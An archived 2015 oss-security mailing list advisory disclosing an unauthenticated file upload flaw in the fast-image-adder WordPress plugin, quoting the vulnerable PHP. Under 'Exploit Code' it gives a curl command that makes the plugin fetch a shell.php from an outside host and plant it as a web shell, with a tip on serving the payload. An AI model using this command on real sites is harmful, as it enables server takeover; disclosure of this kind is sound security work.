Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 16 Jul 2015 21:51:20 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Remote file upload vulnerability in fast-image-adder v1.1 Wordpress
 plugin

Title: Remote file upload vulnerability in fast-image-adder v1.1 Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-10
Download Site: https://wordpress.org/plugins/fast-image-adder
Vendor: https://profiles.wordpress.org/robbyslaughter/
Vendor Notified: 2015-07-10, plugin silently pulled?
Vendor Contact: plugins@...dpress.org
Description: Add images to your blog posts from a URL in a flash. Skip the download/upload steps and the slow WordPress dialog box.
Vulnerability:
The  fast-image-adder-uploader.php  file doesn't check if a user is authorized to upload files: It creates a random file name, but reports the name back to the user.

 60          $upload_dir = wp_upload_dir();
 61          $path = $upload_dir['path'];
 62          $new_filename = $suggested_name_filesystem . "_" . random_filename() . substr($url,strrpos($url,"."));
 63          
 64 
 65          // If we are not in test mode, get the file and resize it         
 66          if ($test_mode === FALSE)
 67          {
 68            $image_data = file_get_contents($url);
 69            file_put_contents($path . "/" . $new_filename,$image_data);
 70            resize($path . "/" . $new_filename, $new_height, $new_width, $val_maxwidth, $path . "/" . $new_filename);
 71          }   
 72          
 73          $new_url = $upload_dir['url'] . "/" . $new_filename;
.
.

 83          if ($test_mode === FALSE)
 84          {
 85            echo "Uploaded as " . $new_url;
 86          }

CVEID:
OSVDB:
Exploit Code:
	• $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://192.168.0.2/shell.php
	• Shell location is reported back to the user with random filename.  The url site must not interpret php, but allow it for download.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ